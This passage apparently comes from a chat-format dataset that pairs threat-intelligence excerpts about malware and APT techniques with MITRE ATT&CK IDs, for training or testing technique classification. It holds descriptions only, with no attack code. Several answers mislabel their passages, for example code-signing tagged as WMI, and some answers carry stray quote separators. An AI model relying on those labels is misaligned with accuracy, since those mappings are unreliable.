- "role": "user",
- "content": "Impacket's wmiexec module can be used to execute commands through WMI."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Misdat saves itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We observed that the InstallUtil.exe process was being created in suspended mode. Once it started execution, we compared its memory artifacts to a benign execution of InstallUtil.exe and concluded that the malicious payload is being injected into the memory of the newly spawned InstallUtil.exe process. We also observed that no arguments are passed to InstallUtil, which would cause an error under normal execution since InstallUtil always expects at least one argument."
- },
- {
- "role": "assistant",
- "content": "T1218.004 - Signed Binary Proxy Execution: InstallUtil"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this case, after the payload is delivered via an exploit the threat actor places files (named upload.bat, upload.rar, and period.txt, download.txt or silent.txt) in a directory on a Dropbox account"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. Although concrete details of the attacks are not yet public, Google made reference to a number of Gmail accounts that were compromised during or after the attacks. Anatomy of the Attack For a number of years targeted attacks have nearly always followed the same modus operandi. In the more sophisticated attacks, the attacker will use a new zero day vulnerability, as obviously this will have a greater success rate. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim’s machine by taking advantage of the vulnerability. The number of computers we have observed being attacked or have been attacked is low as borne out by our field detection statistics. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the following example, archives for exfiltration were renamed as .tmp files: move \\\\{FILE PATH}\\c$\\programdata\\AT.part01.rar \\\\{FILE PATH}\\c$\\programdata\\at01.tmp The TMP files were then staged for exfiltration on Internet-facing servers that had previously been compromised with the China Chopper web shell"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ransomware also stops security software-related processes to evade detection and termination of its malicious activities"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mimikatz's \"CRYPTO::Extract\" module can extract keys by interacting with Windows cryptographic application programming interface (API) functions."
- },
- {
- "role": "assistant",
- "content": "T1552.004 - Unsecured Credentials: Private Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain a list of running processes on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TDTESS provides a reverse shell on the victim."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a new service named “ntssrv” to execute the payload."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution', 'T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard has established tmate sessions for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot has written its payload into a newly-created `EhStorAuthn.exe` process using `ZwWriteVirtualMemory` and executed it using `NtQueueApcThread` and `ZwAlertResumeThread`."
- },
- {
- "role": "assistant",
- "content": "T1055.004 - Process Injection: Asynchronous Procedure Call"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThiefQuest can download and execute payloads in-memory or from disk."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has extracted password hashes from ntds.dit to crack offline."
- },
- {
- "role": "assistant",
- "content": "T1110.002 - Brute Force: Password Cracking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Revenge RAT has a plugin for microphone interception."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the implementation of Flagpro v1.0, if a dialog titled “Windows セキュリティ” is displayed when Flagpro accesses to an external site, Flagpro automatically clicks OK button to close the dialog. This handling also works when the dialog is written Chinese and English. It can indicate the targets are Japan, Taiwan, and English-speaking countries. Flagpro v2.0 checks whether both username and password are filled in a dialog as an additional feature before clicking the OK button"
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "leveraged a watering hole to serve up malicious code."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Squirrelwaffle has been obfuscated with a XOR-based algorithm."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This simply acts as cleanup to ensure original file artifacts no longer reside on the infected machine"
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "accesses the HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData Registry key to obtain the System manufacturer value to identify the machine type."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackdoorDiplomacy has used NetCat and PortQry to enumerate network connections and display the status of related TCP and UDP ports."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We identified new MSIL components deployed by Zebrocy. While recent Zebrocy versioning was 7.1, some of the related Zebrocy modules that drop file-stealing MSIL modules we call Covfacy were v7.0. For example, one sent out to a handful of countries identifies network drives when they are added to target systems, and then RC4-like-encrypts and writes certain file metadata and contents to a local path for later exfiltration. The stealer searches for files 60mb and less with these extensions"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldenSpy has used HTTP over ports 9005 and 9006 for network traffic, 9002 for C2 requests, 33666 as a WebSocket, and 8090 to download files."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap is a kernel-mode rootkit used for cryptocurrency mining."
- },
- {
- "role": "assistant",
- "content": "T1496 - Resource Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can create a backdoor in KeePass using a malicious config file and in TortoiseSVN using a registry hook."
- },
- {
- "role": "assistant",
- "content": "T1556 - Modify Authentication Process"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lastly, the attackers used Comodo code-signing certificates several times during the course of the campaign. Many of the above TTPs are not unique to ITG08, but collectively, and with the use of More_eggs, strengthen the link to this group"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can download files onto compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet schedules a network job to execute two minutes after host infection."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. The type of data this implant gathers from the victim’s system"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery', 'T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 3 outlines the architecture of Crutch version 3. It includes a backdoor that communicates with a hardcoded Dropbox account using the official HTTP API. In some variants, we noticed the presence of recovery C&C channels using either GitHub or a regular domain"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PROMETHIUM has attempted to get users to execute compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla has the ability to decrypt strings encrypted with the Rijndael symmetric encryption algorithm."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN10 has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has inserted garbage characters into code, presumably to avoid anti-virus detection."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The location of the working directory is determined by the instructions from the remote server. The directory is used as temporary storage for files containing collected data about the compromised computer"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aquatic Panda has attempted to harvest credentials through LSASS memory dumping."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The QakBot web inject module can inject Java Script into web banking pages visited by the victim."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fysbis has the ability to delete files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Clambling dropper can use PowerShell to download the malware."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gazer logs its actions into files that are encrypted with 3DES. It also uses RSA to encrypt resources."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has injected a malicious DLL into the Windows Media Player process (wmplayer.exe)."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Since Operation Clandestine Fox, we have observed this actor execute multiple attacks that did not rely on zero-day exploits. The combination of this sustained operational tempo and lack of zero-day exploits may indicate that this group has changed strategy and has decided to attack more frequently and does not have steady access to zero-day exploit code. No matter the strategy, this actor has shown an ability to operate successfully"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation', 'T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 contains multiple modules for injecting into processes, such as \"Invoke-PSInject\"."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has staged stolen data on designated servers in the target environment."
- },
- {
- "role": "assistant",
- "content": "T1074.002 - Remote Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rover takes screenshots of the compromised system's desktop and saves them to \"C:\\system\\screenshot.bmp\" for exfiltration every 60 minutes."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent has the ability to set persistence using the Task Scheduler."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DHS and FBI identified the threat actors leveraging remote access services and infrastructure such as VPN, RDP, and Outlook Web Access (OWA). The threat actors used the infrastructure of staging targets to connect to several intended targets"
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection', 'T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "enumerates directories and obtains file attributes on a system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BBK has the ability to download files from C2 to the infected host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Janicab captured audio and sent it out to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Process name, service name, and driver path listings are obtained, and each value is hashed via the FNV-1a + XOR algorithm as described previously and checked against hardcoded blocklists. Some of these hashes have been brute force reversed as part of this analysis, showing that these routines are scanning for analysis tools and antivirus engine components. If a blocklisted process is found the Update routine exits and the sample will continue to try executing the routine until the blocklist passes. Some entries in the service list if found on the system may affect the DGA algorithms behavior in terms of the values generated. The list of stopped services is then bit-packed into the ReportWatcherPostpone key of the appSettings entry for the samples’ config file. The sample retrieves a driver listing via the WMI query Select * From Win32_SystemDriver"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Explosive has a function to download a file to the infected system."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kazuar gathers information about local groups and members."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Over a few days' span, the threat actors install remote access tools on additional systems based upon the results of the network reconnaissance. They use At.exe to schedule tasks to run self-extracting RAR archives, which install either HttpBrowser or PlugX. CTU researchers observed the threat actors collecting Cisco VPN profiles to use when accessing the victim's network via VPN (see Figure 13"
- },
- {
- "role": "assistant",
- "content": "T1053.002 - Scheduled Task/Job: At', 'T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZIRCONIUM has used a tool to capture the processor architecture of a compromised host in order to register it with C2."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "leveraged a compiled HTML file that contained a command to download and run an executable."
- },
- {
- "role": "assistant",
- "content": "T1218.001 - Signed Binary Proxy Execution: Compiled HTML File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has enumerated installed applications on macOS devices with built-in utilities such as \"ls -al /Applications\"."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POLONIUM has used compromised credentials from an IT company to target downstream customers including a law firm and aviation company."
- },
- {
- "role": "assistant",
- "content": "T1199 - Trusted Relationship"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the group name of the logged-in user and sends it to the C2."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used a modified and obfuscated version of the reGeorg web shell to maintain persistence on a target's Outlook Web Access (OWA) server."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has used PowerShell to drop and execute malware loaders."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GCMAN uses Putty for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021.004 - Remote Services: SSH"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We determined the string in the pre tags is the actor provided password, which the webshell uses as a key to decrypt the embedded payload. We determined this by following the process in which the TwoFace++ loader webshell uses the actor provided password to authenticate and decrypt the embedded webshell:"
- },
- {
- "role": "assistant",
- "content": "T1552.004 - Unsecured Credentials: Private Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Denis encodes the data sent to the server in Base64."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has collected files and other sensitive information from a compromised network."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can use a timer to delay execution of core functionality."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Javali has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript."
- },
- {
- "role": "assistant",
